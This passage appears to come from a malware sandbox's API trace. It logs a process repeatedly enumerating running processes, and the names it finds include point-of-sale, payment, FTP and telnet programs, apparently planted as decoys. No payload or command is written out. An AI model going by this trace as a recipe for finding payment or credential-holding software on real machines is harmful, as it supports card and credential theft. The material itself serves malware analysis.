hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0253.413] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0253.416] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0253.420] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0253.423] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0253.425] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0253.505] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0253.508] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0253.511] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0253.514] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0253.516] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0253.518] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0253.521] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0253.523] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0253.527] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0253.530] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0253.533] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0253.535] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0253.537] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0253.540] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0253.546] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.549] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0253.551] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0253.554] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.558] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0253.560] CloseHandle (hObject=0x2060) returned 1 [0253.560] Sleep (dwMilliseconds=0x64) [0253.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0253.676] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.678] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.679] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.681] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.683] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.685] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.687] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.688] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.690] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.692] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.694] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.697] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.704] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.706] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.707] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.709] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.711] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.713] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.714] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.716] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.718] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0253.720] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.722] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0253.723] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.725] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0253.727] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0253.729] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0253.731] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0253.732] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0253.734] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0253.736] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.738] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.742] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0253.743] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.745] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.747] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.749] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.750] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0253.752] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0253.754] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0253.756] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0253.758] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0253.759] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0253.761] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0253.763] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0253.764] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0253.766] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0253.768] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0253.769] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0253.771] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0253.773] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0253.775] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0253.781] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0253.783] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0253.786] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0253.788] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0253.790] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0253.792] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0253.795] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0253.798] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 